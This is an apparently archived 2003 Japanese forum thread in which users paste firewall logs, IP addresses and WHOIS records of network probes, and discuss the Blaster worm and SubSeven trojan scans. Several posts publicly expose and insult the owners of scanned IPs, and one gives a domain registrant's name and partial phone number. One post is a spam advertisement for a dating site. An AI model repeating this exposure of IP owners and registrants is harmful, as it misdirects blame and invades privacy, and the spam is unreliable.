低脳どもはどうして低脳といわれているかわからないようだ。
889被害者:03/10/05 18:47
これは犯罪文ですか?
「●の仲間でいることを恥たほうがいい。

●が出入りしてるせいで、いつのまにか友達減ったの気づいてないの?
自分では普通のつもりでも、周りは同じ人種と判断するからねぇ…
そして、何がすごいって、●、まじであっちこっちで嫌われてるね。
知らないところで悪口言われてるよ。
こんなに嫌がられてる人も珍しいよなぁ…はじめてみたかも。
相変わらず悪口たくさんかかれてる鼻つまみ者」

これを公の場で書く奴
しかも、嘘ばっかり言いふらしてます。HP管理妨害です。
これは偽証罪では?

こいつのせいで、えん罪ですよ。
890名無しさん@お腹いっぱい。:03/10/08 21:43
218.222.143.166
U143166.ppp.dion.ne.jp
↑また来たか。屑。
64.4.22.24
893名無しさん@お腹いっぱい。:03/10/09 20:11
92.163.3.1  

OrgName: Texas Instruments
OrgID: TEXASI-4
Address: 13500 North Central Expressway
City: Dallas
StateProv: TX
PostalCode: 75243
Country: US

NetRange: 192.163.3.0 - 192.163.3.255
CIDR: 192.163.3.0/24
NetName: TISPDC-3
NetHandle: NET-192-163-3-0-1
Parent: NET-192-0-0-0-0
NetType: Direct Assignment
Comment:
RegDate: 1992-05-08
Updated: 1992-05-08

# ARIN WHOIS database, last updated 2003-10-08 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.
894初心者君:03/10/09 21:52
ホスト名: adsl-67-116-216-25.dsl.sndg02.pacbell.net
IPアドレス: 67.116.216.25

ここから攻撃を受けているんですけど、なんなんでしょうか。
ほかにもたくさんくるんですけど。主にアメリカみたい。
89580.182.119.102:1112:03/10/10 21:03
IPアドレス 80.182.119.102
ホスト名 host102-119.pool80182.interbusiness.it
割当国 ※ イタリア (IT)
896名無しさん@お腹いっぱい。:03/10/11 02:37
φ( ..)
BlackICE PC Protectionによると 遮断状況, 侵入者
1, zaqd378a033.zaq.ne.jp
1, public4-seve1-3-cust14.lond.broadband.ntl.com 英国ケンブリッジ
1, pcp444009pcs.savana01.ga.comcast.net 米国アトランタ
1, p5019-ipad01tokusinwcc.tokushima.ocn.ne.jp
1, p1177-ipbf07hodogaya.kanagawa.ocn.ne.jp
1, nttkyo145077.tkyo.nt.ftth2.ppp.infoweb.ne.jp
1, ntfkok053042.fkok.nt.ftth.ppp.infoweb.ne.jp
1, nissin42100.ccnw.ne.jp
1, i211099.ppp.asahi-net.or.jp
1, gate80.people-i.ne.jp
1, flhyg1-p194.hi-ho.ne.jp
1, adsl-66-136-95-70.dsl.rcsntx.swbell.net 米国テキサス州リチャードソン
1, adsl-158-181-135.mia.bellsouth.net 米国マイアミ州
1, aa2001080079003.userreverse.dion.ne.jp
1, YahooBB221090008001.bbtec.net
1, YahooBB220043232122.bbtec.net
1, YahooBB220043232051.bbtec.net
1, YahooBB219186232002.bbtec.net
1, YahooBB219025144008.bbtec.net
1, YahooBB219006058012.bbtec.net
1, U015106.ppp.dion.ne.jp
1, FLH1Aah253.sig.mesh.ad.jp
1, 64.49.220.233 米国カリフォルニア州バーバンク
1, 61-22-163-229.home.ne.jp
1, 218.90.217.206 中国 北京
中国 北京は(パロ・アルト経由)サンフランシスコ近郊の都市を経由
1, 218.234.128.2 韓国ソウル
1, 218.231.78.9.eo.eaccess.ne.jp
1, 211.75.173.44 台湾
1, 198.209.2.162 米国イリノイ州
897名無しさん@お腹いっぱい。:03/10/11 02:54
>>896
何か悪いことでもしたの?
医療法人千徳会
何か用?
4.43.174.223
900名無しさん@お腹いっぱい。:03/10/11 07:32
>>899 さん
4.43.174.223は、エヴェレット(シアトルの近くにある街)からの
 アタックです。
カリフォルニア州ミルピタス経由で899さんのPCまで来たみたいです。
VisualRoute日本語版で追跡して解った事の詳細↓(一部不要な所をカット済み)
Verizon Trademark Services LLC [email protected]
Verizon Trademark Services LLC
1320 North Court House Road
Arlington, VA 22201
US
1-9727187621
FAX: 1-9727183946
Domain Name: DSL-VERIZON.NET
Domain Status: Client Locked
Administrative Contact:
Christian R. Andersen [email protected]
Verizon
600 Hidden Ridge Drive HQE03H01
Irving, TX 75038
US
1-9727187621
Record last updated on:..2002-04-04 00:00:00.0
Record expires on:.......2005-04-04 00:00:00.0
Record created on:.......2002-04-04 00:00:00.0

Domain Name Servers:
dnsauth1.sys.gtei.net 4.2.49.2
dnsauth2.sys.gtei.net 4.2.49.3
901名無しさん@お腹いっぱい。:03/10/11 08:18
>>897さん、 896ですが
してません
902名無しさん@お腹いっぱい。:03/10/11 19:48
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.238.32.0-202.238.39.0
b. [ネットワーク名] MICSNET
f. [組織名] 株式会社西三河ニューテレビ放送
g. [Organization] Nishimikawa New-TV Broadcasting CORPORATION
m. [運用責任者] YN2945JP
n. [技術連絡担当者] JN445JP
n. [技術連絡担当者] KI4020JP
n. [技術連絡担当者] KM1184JP
n. [技術連絡担当者] TS7372JP
p. [ネームサーバ] ns.catvmics.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2001/03/16
[最終更新] 2002/01/21 10:37:31 (JST)
[email protected]
03/07/27の23:18:24〜23:37:25に渡って計21回
90424.158.189.224:03/10/12 01:55
24.158.189.224
905名無しさん@お腹いっぱい。:03/10/12 10:04
今日3回目
24.44.221.134
906210.186.58.164:1101:03/10/12 13:27
210.186.58.164:1101
907名無しさん@お腹いっぱい。:03/10/12 13:53
62.163.180.166
908名無しさん@お腹いっぱい。:03/10/12 15:51
cpe-024-211-082-036.sc.rr.com
909名無しさん@お腹いっぱい。:03/10/12 16:43
43.244.38.176
43.244.160.219
43.244.244.190

詳しい人、教えてください。
毎日100回くらい、ログに残ってるの。
43.244までは、同じだけど、後ろの数字が変化してます。
911 :03/10/12 16:49
>>909
範囲が同じなら、全部範囲でブロックしたら?
43.1.1.1〜43.255.255.255で。

なんか今日はやたらと俺もアタックが多い。
1時間で4回ぐらい違うIPからきた。
しかも、全部海外。
912名無しさん@お腹いっぱい。:03/10/12 16:56
>>909
■43.244.160.219■
a. [Domain Name] YOURNET.NE.JP
d. [Network Service Name] FreeBit.Net Service
l. [Organization Type] Network Service
m. [Administrative Contact] TS6060JP
n. [Technical Contact] TI151JP
p. [Name Server] ns1.freebit.net
p. [Name Server] ns2.freebit.net
y. [Reply Mail] [email protected]
[State] Connected (2004/04/30)
[Registered Date] 2003/04/25
[Connected Date] 2003/05/02
[Last Update] 2003/05/02 10:53:04 (JST)
全部同じとこからみたいだよYOURNET.NE.JP使ってるんだろ?
ここ↓を利用して調べてみたらいいよ!

。VisualRoute - Next IT Inc. JAPAN 。

http://visualroute.next-it.com/vr.html


913名無しさん@お腹いっぱい。:03/10/12 16:57
>>911
オレも昨日の夜中から10回以上アタックされてる・・・
同じような人が他にもいるのかな
914名無しさん@お腹いっぱい。:03/10/12 17:00
915名無しさん@お腹いっぱい。:03/10/12 17:05
213.208.116.134
221.158.23.68
65.69.87.153
219.1.121.136
218.254.36.156
219.1.242.86
218.254.117.88
65.24.236.202
24.167.128.242
66.93.152.58
63.161.178.66
66.93.152.58
67.117.47.95
202.115.204.182
68.145.211.158
24.85.64.19
4.41.130.147
61.10.18.48
10〜30秒ごとに色んな所からきてるんですがなんでしょうかね?
PCつけて1時間で500こえてます。
916名無しさん@お腹いっぱい。:03/10/12 17:20
>>915
プロバイダーはどこつかってる?
917915:03/10/12 17:46
>>916

YBBです。
918909:03/10/12 17:50
>>910,911,912,913,914さん
教えてくれてありがと〜
ブロックとか、がんばってやって見ます

919名無しさん@お腹いっぱい。:03/10/12 18:15
24.217.210.2
920911:03/10/12 18:33
>>913
普段は1ヶ月に2回ぐらいなんだけど、昨日今日とやたら多いよねぇ。
なんか新種のウイルスが出てたりしてw

>>918
ノートン使ってるなら、ファイアウォール→インターネットゾーン制御
でやるとよろし。(ちなみに2002ね)

時間, イベント, 侵入者, 侵入者の IP, カウント, 宛先ポート, 発信元ポート
2003/10/11 18:19:03, UDP_Probe_Other, p0733-ip01okayamaima.okayama.ocn.ne.j○, ○1.119.190.225, 356, 2350, 69
2003/10/11 18:18:02, UDP_Probe_Other, p0733-ip01okayamaima.okayama.ocn.ne.j○, 61.119.190.22○, 21, 2350, 69
2003/10/11 18:17:44, UDP_Probe_Other, p0733-ip01okayamaima.okayama.ocn.ne.j○, 61.119.190.22○, 460, 2350, 69
ネトゲの厨房が調子に乗ってる
922名無しさん@お腹いっぱい。:03/10/12 20:50
24.199.192.33
ここから、さっきから8回きました。
トロイの木馬の危険とか出ました。
923913:03/10/12 21:57
>>917
私もYBBです。
>>911
友人も今日と昨日からアタックが多いと言ってる。
924名無しさん@お腹いっぱい。:03/10/12 22:10
俺もY!BBだがトロイがしつこい……。

↓こいつ氏ね。
80.213.103.225
925915:03/10/12 22:17
まだアタックしまくられています。
初めは海外が多かったのですが今は国内のIPアドレスからもきています。
1分間に3〜8回程きてます。
どうしたらいいんだ・・・。
Port:17300?
あのさーアタッカーって一体何か聞いていいか…?
928名無しさん@お腹いっぱい。:03/10/12 22:56
ドゾ!(ry
929 :03/10/12 23:04
トロイ祭り開催中だな。
930名無しさん@お腹いっぱい。:03/10/12 23:56
トロイ来まくってるけど全部国が違う。
どういうこった?
931名無しさん@お腹いっぱい。:03/10/13 00:27
本当にどうしたんだろう?トロイが私も来まくってる・・・・
932名無しさん@お腹いっぱい。:03/10/13 01:09
送信先ポート10000はやばいの?
933212.95.105.243:4523:03/10/13 01:54
212.95.105.243:4523
今度はドイツだー。
934名無しさん@お腹いっぱい。:03/10/13 02:11
>>933
オレも一緒のIPから来た
935名無しさん@お腹いっぱい。:03/10/13 02:55
>>929-931
同じくここ2〜3日、Backdoor.SubSevenのトロイが
米国、オランダ、カナダなどから頻繁に来ている
なぜだ?
936名無しさん@お腹いっぱい。:03/10/13 20:40
[Domain Name] LIVEDOOR.JP
[Name] Kato
Shinagawa-ku, Tokyo
[Phone] 03-5749-9***
>>936
お前馬鹿?
テキサス大学…踏み台?
939名無しさん@お腹いっぱい。:03/10/14 00:35
219.115.85.207

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.115.0.0-219.115.187.0
b. [ネットワーク名] JCOM-NET
f. [組織名] 株式会社ジェイコム関西

木馬ヤロウ

940名無しさん@お腹いっぱい。:03/10/14 01:53
あかんたれな ハッカーたち
pcp01184969pcs.strl301.mi.comcast.net
crtntx1-ar5-4-63-100-166.crtntx1.dsl-verizon.net
cpe-024-211-082-036.sc.rr.com
clt25-68-029.carolina.rr.com
68.58.120.139
 貧乏人一覧 と言う事にしとく...
どうせ日本語しかわからんのやから文句も言えんしな、俺(ry
941名無しさん@お腹いっぱい。:03/10/14 18:08
218.47.15.220

さっきからうざいよ plala
942名無しさん@お腹いっぱい。:03/10/14 18:13
1.【IPアドレス:24.226.86.48】
IPアドレス24.226.86.48
ホスト名d226-86-48.home.cgocable.net
IPアドレス
 割当国 ※カナダ (CA)
都道府県該当なし
市外局番該当なし
接続回線該当なし
Whois 検索結果
IPアドレス
 所有者情報24.226.86.48 を whois.arin.net で検索しましたCogeco Cable Inc. COGECOWAVE-1 (NET-24-226-0-0-1)
24.226.0.0 - 24.226.127.255
Cogeco Cable Solutions CGOC-KICO4-1 (NET-24-226-80-0-1)
24.226.80.0 - 24.226.95.255
2.【IPアドレス:202.106.104.210】

検索結果
IPアドレス202.106.104.210
ホスト名対応するホスト名がありません
IPアドレス
 割当国 ※中国 (CN)
都道府県該当なし
市外局番該当なし
接続回線該当なし
Whois 検索結果
IPアドレス
 所有者情報Whois Server にアクセスできません。

943名無しさん@お腹いっぱい。:03/10/14 19:04
2003/10/14 18:45:53頃下記のIPアドレスの持ち主からハッキングされそうになりました。
               
TCP_Probe_Other, cpe-024-165-126-251.cinci.rr.com

【IPアドレス 24.165.126.251】
検索結果
IPアドレス24.165.126.251
ホスト名cpe-024-165-126-251.cinci.rr.com
IPアドレス
 割当国 ※アメリカ合衆国 (US)
都道府県該当なし
市外局番該当なし
接続回線該当なし
Whois 検索結果
IPアドレス
所有者情報24.165.126.251 を whois.arin.net で検索しました


OrgName: Road Runner
OrgID: RRMA
Address: 13241 Woodland Park Road
City: Herndon
StateProv: VA
PostalCode: 20171
Country: US
Whoisを貼るだけなら猿でも出来るな。
時間, イベント, 侵入者, 侵入者の IP, カウント, 宛先ポート, 発信元ポート
2003/10/14 18:48:58, UDP_Probe_Other, p4121-ip01okayamaima.okayama.ocn.ne.jp, 61.126.163.122, 583, 2350, 2350
946名無しさん@お腹いっぱい。:03/10/14 20:44
どうやってアタッカーのIPを調べるのですか?
火壁のログ見れ
948名無しさん@お腹いっぱい。:03/10/14 22:58
219.110.61.210

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.110.61.0
b. [ネットワーク名] ITSCOM-NET
f. [組織名] イッツ・コミュニケーションズ株式会社
g. [Organization] its communications Inc.
210.254.104.117

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.254.102.0-210.254.106.0
b. [ネットワーク名] BAYNET1
f. [組織名] 東京ベイネットワーク株式会社
g. [Organization] Tokyo Bay Network Co.,Ltd
211.3.61.158

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.3.0.0-211.3.255.0
b. [ネットワーク名] ODN
f. [組織名] オープンデータネットワーク(日本テレコム株式会社)
g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.)
211.0.179.186

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.0.160.0-211.0.255.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
211.125.196.137

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.125.196.0-211.125.199.0
b. [ネットワーク名] BAI-CATV
f. [組織名] アイテック阪神株式会社
g. [Organization] ITEC HANSHIN CO.,LTD.
61.119.244.148

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.119.128.0-61.119.255.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
211.122.64.52

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.122.0.0-211.122.255.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
219.140.161.27

inetnum: 219.140.0.0 - 219.140.255.255
netname: CHINANET-HB-WH
country: CN
descr: Chinanet network in Wuhan city Hubei province
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:21863->localhost:3128, Owner: no owner
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:25592->localhost:3129, Owner: no owner
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:23314->localhost:4480, Owner: no owner
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:23893->localhost:6588, Owner: no owner
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:24313->localhost:8088, Owner: no owner
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:22787->localhost:34344, Owner: no owner
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:25327->localhost:38382, Owner: no owner
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:21283->localhost:43344, Owner: no owner
957名無しさん@お腹いっぱい。:03/10/16 22:27
なんか 今日は、135ポートに、いろんなところからしつこいんだが

なんかあったのか?

知ってる人教えて。
958名無しさん@お腹いっぱい。:03/10/16 23:37
>>957
80のBlasterスレでも見たら!
959名無しさん@お腹いっぱい。:03/10/17 00:50
【WORM_MSBLAST.D miniFAQ 一般的なお話】 

Q このICMPの接続要求って攻撃されてるってこと? 
A このウィールス(正確にはワーム)はICMP(2048)を自分の周囲のPCに猛烈に打ち
  まくり、返事があるとport135というドアから入りこみます。鯖立ててる場合以外は
  ファイアウォールでport135を閉めておけばOK。ping自体は無害です。


って事ですか、ポートは閉じてあるのですが、かなりウザイですね。

ブラスターって事ですねw
960名無しさん@お腹いっぱい。:03/10/17 03:05
ここ、かなりいいよ。
システムがシンプルで使いやすいから出会い系初心者の女の子が多いみたい。
だから笑っちゃうくらい簡単に落ちるんだ。
おととい遊んだ池袋の子なんてメール3回で陥落!
ハッキリ言って入れ食い状態です(笑)
サクラばっかりの出会い系にウンザリって人、騙されたと思って覗いてみて。
無料ポイントもたっぷりもらえるしお金使う心配はないと思うよ。
(ちなみに俺は3人の子と会ったけどまだ一円も使ってません。(笑))

http://www.com1.info/

どうぞ <a href="http://www.com1.info/">穴場発見!</a> サイトにお越しください
218.229.196.163
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
961名無しさん@お腹いっぱい。:03/10/17 18:23
さらしage、

侵入者, YahooBB219019208225.bbtec.net
 侵入者Ip :219.19.208.225

侵入者, IMMfi-01p1-147.ppp11.odn.ad.jp
 侵入者IP:61.116.70.147

 侵入者, AS-93-208.dial-up.siol.net
 侵入者IP:212.30.68.208

侵入者, AS-98-222.dial-up.siol.net
侵入者IP:212.30.94.222

侵入者, 61.98.26.138
 侵入者IP: 61.98.26.138

侵入者, 218.62.26.173
侵入者IP: 218.62.26.173
962名無しさん@お腹いっぱい。:03/10/17 18:53
さらしage
侵入者, r25-ctiHS2.E.loxinfo.net.th
侵入者IP: 203.146.160.89

侵入者, 213.37.81.16
侵入者IP: 213.37.81.16
pool-64-222-151-202.man.east.verizon.net

さっきから80, 1080, 8080を叩いてる・・・
61.204.106.54
965名無しさん@お腹いっぱい。:03/10/20 00:34
コンコンコンコンコン・・・
警察庁、TCP445番ポートに対するトラフィック増加を警告
http://internet.watch.impress.co.jp/cda/news/2003/10/20/794.html
202.81.170.216

誰だ?love letterかましてきたヴォケは。
968名無しさん@お腹いっぱい。:03/10/21 02:28
>>967
フィリピンからだよ。      VisualRoute日本語版調べ
SOFTはこちら↓(ノートンに付いてるやつの本家↑)
ネクスト・イット株式会社
ttp://www.next-it.com/jp/solution/visualware/index.html
969名無しさん@お腹いっぱい。:03/10/21 02:42
968の者です。
ネクスト・イット株式会社HP内の→ VisualRoute と言う上に書いてある文字をクリックしたら↓
 ライブデモをクリック!→  VisualRouteを体験出来ます!。(一度自分で追跡してみて下さい)
俺はVisualRoute日本語版を日本橋の上新電機で\5100ー.(税抜き)で買いました。
ノートンのやつで気に入ってて 即購入! しましたぁー。(・3・)
またそのピーナから。uze-

210.23.172.9
971名無しさん@お腹いっぱい。:03/10/22 03:16
~~旦_(σ_σ)
972217.225.59.122:3987:03/10/22 10:42
217.225.59.122:3987
YahooBB219039218158.bbtec.net

ウザ過ぎ
いまさらルーターはずしてPFWだけにするのは怖いw
よってどこの誰それが叩いているやら・・・

以前セットアップしてネットに繋いだ時、
いきなりPFWからグローバルIPの誰かさんと共有しますかと聞かれてビックらこいた。
あのIPのお方は今・・・・?w
何かの悪意があったのか、或いは初心者の平凡ミスだったのか?
うーん・・・・
975219.122.201.122:03/10/26 16:49
219.122.201.122
976210.159.211.68:03/10/27 20:45
210.159.211.68
accsnet.ne.jp preference = 10, mail exchanger = ns.accsnet.ne.jp
accsnet.ne.jp nameserver = ns.accsnet.ne.jp
accsnet.ne.jp nameserver = ns-tk013.ocn.ad.jp
ns.accsnet.ne.jp internet address = 210.235.48.67
ns-tk013.ocn.ad.jp internet address = 203.139.160.75
(社)コンピュータソフトウェア著作権協会
ttp://www.accsjp.or.jp/
社団法人コンピュータソフトウェア著作権協会(ACCS)のホームページです。本協会はデジタル著作物の権利保護や著作権に関する 啓発・ 普及活動を通じて、コンピュータ社会における文化の発展に寄与する事を目的として設立された公益法人です。

ACCSnet - ホームページ
ttp://www.accsnet.ne.jp/
加入案内>ACCSnetとは?
--------------------------------------------------------------------------------
 ACCSは、1999年11月29日、郵政大臣から「第一種電気通信事業」の許可を受け、2000年4月1日からインターネット接続サービスを開始いたしました。
 ACCSのCATVネットワークは、[600+R]方式という、わが国初の最新鋭のネットワークで、広帯域・高品質・双方向の特性を生かした、高速デジタルデータ伝送や50チャンネル放送を行うことが出来ます。
 特に、インターネットは<高速・定額・便利>と三拍子そろったサービスを皆様にご提供することができます。
62.189.229.189

inetnum: 219.164.0.0 - 219.164.127.255
netname: PLALA
descr: Plala Networks Inc.
country: JP
admin-c: MN2905JP
tech-c: HS3694JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
changed: [email protected] 20020419
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
changed: [email protected] 20031015
source: JPNIC